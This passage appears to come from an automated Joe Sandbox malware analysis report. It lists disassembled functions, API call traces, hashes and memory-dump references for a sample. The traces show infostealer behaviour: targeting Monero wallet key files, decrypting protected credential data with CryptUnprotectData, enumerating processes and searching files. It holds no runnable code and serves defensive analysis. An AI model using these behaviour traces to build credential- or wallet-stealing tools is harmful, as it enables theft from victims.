                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: cd7f036bf6f2477f84f5ad380a194737f933ad01d6aaca5f53a800acc5db9c1d
                        • Instruction ID: c88520bb81cbd7c90f7b07b324ddc980a53ca6c57e86f84c86c0f26c84574d0c
                        • Opcode Fuzzy Hash: cd7f036bf6f2477f84f5ad380a194737f933ad01d6aaca5f53a800acc5db9c1d
                        • Instruction Fuzzy Hash: E0412A7194121CABDB24EB94DC99BEEB374FF44710F604199E00A66181DB386FC6DFA1
                        Function 012C175A Relevance: 10.3, Strings: 7, Instructions: 1565COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )Un_$6'_u$6'_u$b+&V$c/?z$mL~$S_
                        • API String ID: 0-3782661490
                        • Opcode ID: 862162499b65ff12fa11f6bba9b570a30e54f9b1a79280976502aaba0dde9fc2
                        • Instruction ID: 88530306c03fc43edff8fd14afef610e57084c73f778e5c9d6ec5443bda39c41
                        • Opcode Fuzzy Hash: 862162499b65ff12fa11f6bba9b570a30e54f9b1a79280976502aaba0dde9fc2
                        • Instruction Fuzzy Hash: 3AB2F6F3A0C2149FE3047E2DEC8567ABBE5EF94720F1A493DEAC483744EA3558058697
                        Function 00F0E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F20D73), ref: 00F0E4A2
                        • StrCmpCA.SHLWAPI(?,00F214F8), ref: 00F0E4F2
                        • StrCmpCA.SHLWAPI(?,00F214FC), ref: 00F0E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: c93b31d1f32c50a22130b1735ec8490a2d2481e690d8e5e37a35cb74f43a6e2a
                        • Instruction ID: ba19c9de1a023abf7e1f43b814b4dc0a711d510d348756f5fd1703ec14d63e30
                        • Opcode Fuzzy Hash: c93b31d1f32c50a22130b1735ec8490a2d2481e690d8e5e37a35cb74f43a6e2a
                        • Instruction Fuzzy Hash: BD1262719011189BDB18FB60DD96EED7338AF54320F4045A9B50A960D1EF386FCAEF92
                        Function 012C8186 Relevance: 9.1, Strings: 6, Instructions: 1607COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: >N;q$Y?w_$\]$^\w_$b4=$37
                        • API String ID: 0-2706271634
                        • Opcode ID: f6818c804a72e3bd72c0a1c811763840df0911ce591a23df0dd7ead44da941a5
                        • Instruction ID: 29a8e25a459cc171959b1900c697010c1f0e3d078ebb93d4d21cf0f6cfa8efbc
                        • Opcode Fuzzy Hash: f6818c804a72e3bd72c0a1c811763840df0911ce591a23df0dd7ead44da941a5
                        • Instruction Fuzzy Hash: 37B2E5F360C2049FE3046E29EC8577AFBE9EF94720F16492DE6C5C3744E63558418697
                        Function 00F0C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F0C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F0C87C
                        • lstrcat.KERNEL32(?,00F20B46), ref: 00F0C943
                        • lstrcat.KERNEL32(?,00F20B47), ref: 00F0C957
                        • lstrcat.KERNEL32(?,00F20B4E), ref: 00F0C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 7c152d59647deec6683fc98d89a6cc81caca06b670377635d0d0e86296a5320c
                        • Instruction ID: 9699dec8ea5e5c2c61284465e48d11350ecda291eb791e2a861b056e4554ecd5
                        • Opcode Fuzzy Hash: 7c152d59647deec6683fc98d89a6cc81caca06b670377635d0d0e86296a5320c
                        • Instruction Fuzzy Hash: D8417379D4421ADBDB20CF90ED89BEEBBB8BF44704F1042A8E509A7280D7705A84DF91
                        Function 00F07240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F0724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F07254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F07281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F072A4
                        • LocalFree.KERNEL32(?), ref: 00F072AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 4770ef39b1c59df3af7ccdfa15d6dbdc913ee7b6ce6da139d705653c298c00a7
                        • Instruction ID: 15b433b4176993f055b9e27844db866817c541d25c731f97ae1b829dd6ec76d4
                        • Opcode Fuzzy Hash: 4770ef39b1c59df3af7ccdfa15d6dbdc913ee7b6ce6da139d705653c298c00a7
                        • Instruction Fuzzy Hash: B10140B5A80208BBEB24DFD4DD45F9D77B8EB44B01F104054FB16AB2C4DA70BA409B64
                        Function 00F19600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F1961E
                        • Process32First.KERNEL32(00F20ACA,00000128), ref: 00F19632
                        • Process32Next.KERNEL32(00F20ACA,00000128), ref: 00F19647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00F1965C
                        • CloseHandle.KERNEL32(00F20ACA), ref: 00F1967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: cde7803f969f51dcba174a6c0f4e41b8c8bcb48391def157ab35b08346f3a538
                        • Instruction ID: 62411d042578dff631b321df783c976612772d1d032f4507c7af40ad94c84a7c
                        • Opcode Fuzzy Hash: cde7803f969f51dcba174a6c0f4e41b8c8bcb48391def157ab35b08346f3a538
                        • Instruction Fuzzy Hash: FD0152B9A44208EBDB28DFA5D864BDDB7F8EF08711F004198A50697240D7749F80DFA0
                        Function 012BF1CC Relevance: 6.5, Strings: 5, Instructions: 274COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: KSG$afK$dUO7$iO,$urY
                        • API String ID: 0-1859660493
                        • Opcode ID: c8a143a00feae3de83c6495ed61a71d78a0016aeee3f1da200b0dd56388c64a5
                        • Instruction ID: 92b9d5714dd0ceb179c69af888f601d6ca6353255b68c048ebe94dda6d337c82
                        • Opcode Fuzzy Hash: c8a143a00feae3de83c6495ed61a71d78a0016aeee3f1da200b0dd56388c64a5
                        • Instruction Fuzzy Hash: C68160F3A0C308AFD3046E1DEC8163AF7DADB94660F1A063DEAC4C7344F93298048696
                        Function 00F18680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F205B7), ref: 00F186CA
                        • Process32First.KERNEL32(?,00000128), ref: 00F186DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00F186F3
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • CloseHandle.KERNEL32(?), ref: 00F18761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 5ac5cea2cce2d58d630df5b956af9eb75f694a39e632ccfcfe7dc1e848ca27f9
                        • Instruction ID: 4aa697447eb09126dbf7aa27cf96b33af8c2d0f4e21785d3c060956e8ecebe1b
                        • Opcode Fuzzy Hash: 5ac5cea2cce2d58d630df5b956af9eb75f694a39e632ccfcfe7dc1e848ca27f9
                        • Instruction Fuzzy Hash: 5F317C72902218ABCB24EF50DD51FEEB778EF44720F1041A9F10AA2190DF356E86DFA1
                        Function 00F18EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00F05184,40000001,00000000,00000000,?,00F05184), ref: 00F18EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 01e828b5bca4817baa54ee9d393b9501ddda72a76d0ce9e6572a60a1d153bca9
                        • Instruction ID: 91d321713486a518dae7d0b5714a61bcee45c74a330cff3834a01ad990bd88c0
                        • Opcode Fuzzy Hash: 01e828b5bca4817baa54ee9d393b9501ddda72a76d0ce9e6572a60a1d153bca9
                        • Instruction Fuzzy Hash: 1F111C75600205BFDB04CFA4E984FE733AAAF89750F109458F9198B244DB35EC82EB60
                        Function 00F09AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                        • LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 925389c3e39b03aa38c02eb128b4e546c01969607dd65b72f66e35795a70f528
                        • Instruction ID: 59a19f140bfe54efd35fbb84295b23bc1bfbe34e17d08ebc51902e2c7ec9d68e
                        • Opcode Fuzzy Hash: 925389c3e39b03aa38c02eb128b4e546c01969607dd65b72f66e35795a70f528
                        • Instruction Fuzzy Hash: 8E11D7B8640208AFEB14CF54D855FAA77B5FB89B11F208058F9159B3C4C7B2A941DB50
                        Function 00F17980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F20E00,00000000,?), ref: 00F179B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F179B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00F20E00,00000000,?), ref: 00F179C4
                        • wsprintfA.USER32 ref: 00F179F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
